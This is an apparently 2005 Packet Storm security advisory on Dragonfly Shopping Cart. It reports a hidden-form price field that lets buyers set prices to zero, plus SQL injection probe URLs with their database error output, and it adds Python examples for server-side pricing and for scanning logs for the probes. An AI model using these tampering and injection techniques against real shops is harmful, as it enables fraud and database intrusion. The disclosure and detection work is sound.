dragonfly.txt
Packet Storm (packetstormsecurity.com), PACKETSTORM:38607
Posted Jul 12, 2005 by Diabolic Crab

Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc., or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Dragonfly Shopping Cart Multiple Vulnerabilities
Date: 11/07/2005

Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modification of product prices, along with SQL injection vulnerabilities.
  
Proof of Concept Exploits:

Hidden Price Value Vulnerability (HPVV)
The product price is submitted back to the server in a hidden form field on the following pages. You can modify these fields to modify the price of the product and thus be able to purchase the biggest and most expensive products for the cheapest possible prices, or even nothing.

/demo/dc_Categorieslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">

/demo/dc_Categoriesview.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

/demo/dc_productslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

/demo/dc_productslist_Clearance.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

There are also many other hidden fields, like IP address etc., which can be used to make the attack "technically" more anonymous, though any normal logging system would catch you ;).
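The fix for the hidden price field is to never price from client input. The following is an added example (Python, not Dragonfly's ASP code) of a checkout handler that looks the price up server-side by product key and only uses the submitted x_DragonflyCartProductPrice value to flag tampering for logging; the catalog, the form submissions and the x_DragonflyCartProductKey field name are assumptions.

```python
from decimal import Decimal, InvalidOperation

# Constructed catalog: product key -> authoritative price. Assumption: the real
# application would read this from its product table instead of a dict.
CATALOG = {
    "5": Decimal("15.49"),
    "12": Decimal("899.00"),
}


def price_item(form: dict) -> tuple:
    """Price one cart line from a parsed POST body.

    Returns (price_to_charge, tampered). The price comes from CATALOG only;
    the submitted x_DragonflyCartProductPrice field is never used for
    pricing, it is only compared against the catalog so that a mismatch can
    be logged. x_DragonflyCartProductKey is a hypothetical field name.
    """
    key = form.get("x_DragonflyCartProductKey")
    if key not in CATALOG:
        raise ValueError("unknown product key: %r" % (key,))
    price = CATALOG[key]
    try:
        submitted = Decimal(str(form.get("x_DragonflyCartProductPrice", "")))
    except InvalidOperation:
        submitted = None          # non-numeric or missing: treat as tampered
    return price, submitted != price


if __name__ == "__main__":
    # Constructed submission: hidden price rewritten to 0, as in the advisory.
    tampered_form = {"x_DragonflyCartProductKey": "12",
                     "x_DragonflyCartProductPrice": "0"}
    price, tampered = price_item(tampered_form)
    print("charge %s (tampered=%s)" % (price, tampered))  # charge 899.00 (tampered=True)
```

A tampered=True result is worth alerting on: a legitimate browser never changes a hidden field, so a mismatch identifies a manually crafted request.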
  
  
  
SQL Injections

/demo/dc_Categoriesview.asp??key='&RecPerPage=5

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_Categoriesview.asp, line 1054


/demo/dc_Categoriesview.asp?key=%26dir%26

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.

/demo/dc_Categoriesview.asp, line 1054


/demo/dc_productslist_Clearance.asp

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

/demo/dc_productslist_Clearance.asp, line 292


/demo/dc_productslist_Clearance.asp?cmd=%27

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

/demo/dc_productslist_Clearance.asp, line 292


/demo/ratings.asp??PID='

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression '[ProductKey]=''.

/demo/ratings.asp, line 68


/demo/dc_Productsview.asp

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_Productsview.asp, line 931


/demo/dc_forum_Postslist.asp?start='

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'nTotalRecs'

/demo/dc_forum_Postslist.asp, line 319


/demo/dc_forum_Postslist.asp?key_m='

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_forum_Postslist.asp, line 200


/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_forum_Postslist.asp, line 200


/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_forum_Postslist.asp, line 200
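Every parameter above (key, PID, cmd, start, key_m, psearchtype) is one the application expects to be a number or a simple token, so a quote, an ampersand or any other punctuation in it is a reliable indicator of probing. As an added example (not part of the advisory), the Python script below applies that check to IIS W3C log lines for the listed endpoints; the log lines, IP addresses and the default W3C field order are assumptions.

```python
import re
from urllib.parse import parse_qs

# Endpoints and query parameters the advisory shows being injected. The app
# expects these to be numbers or simple tokens, so anything else is a probe.
WATCHED = {
    "/demo/dc_categoriesview.asp": {"key"},
    "/demo/ratings.asp": {"pid"},
    "/demo/dc_productslist_clearance.asp": {"cmd"},
    "/demo/dc_forum_postslist.asp": {"start", "key_m", "psearchtype"},
}
SAFE_VALUE = re.compile(r"[A-Za-z0-9]*")


def suspicious_params(stem: str, query: str) -> list:
    """Return watched parameter names whose decoded value is not a plain token."""
    params = WATCHED.get(stem.lower())
    if not params or query == "-":        # "-" is IIS for "no query string"
        return []
    # lstrip handles the advisory's doubled "??key=" form.
    hits = [name for name, values in parse_qs(query.lstrip("?"), keep_blank_values=True).items()
            if name.lower() in params and not all(SAFE_VALUE.fullmatch(v) for v in values)]
    return sorted(hits)


def scan_log(lines: list) -> list:
    """Return (client_ip, uri_stem, flagged_params) for each suspicious W3C log line."""
    findings = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 9:   # skip directives and short lines
            continue
        # Default W3C field order: date time s-ip cs-method cs-uri-stem
        # cs-uri-query s-port cs-username c-ip ...
        stem, query, client_ip = fields[4], fields[5], fields[8]
        hits = suspicious_params(stem, query)
        if hits:
            findings.append((client_ip, stem, hits))
    return findings


# Constructed sample log, not a real capture; 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2005-07-07 10:01:02 10.0.0.5 GET /demo/dc_Categoriesview.asp key=5 80 - 192.0.2.10 Mozilla/4.0 200
2005-07-07 10:01:09 10.0.0.5 GET /demo/dc_Categoriesview.asp ?key='&RecPerPage=5 80 - 192.0.2.77 Mozilla/4.0 500
2005-07-07 10:01:15 10.0.0.5 GET /demo/ratings.asp ?PID=' 80 - 192.0.2.77 Mozilla/4.0 500
2005-07-07 10:01:21 10.0.0.5 GET /demo/dc_forum_Postslist.asp psearch=1&Submit=Search%20%28%2A%29&psearchtype=' 80 - 192.0.2.77 Mozilla/4.0 500
""".splitlines()
```

Running scan_log(SAMPLE_LOG) flags the three probing requests and leaves the legitimate key=5 request alone; pairing the hit with a 500 status, as in the sample, corresponds to the verbose JET error pages shown above.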
  
  
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon-to-come-out book on secure coding with PHP.

--------------------------------------------------------------------------------

Sincerely,
Diabolic Crab
  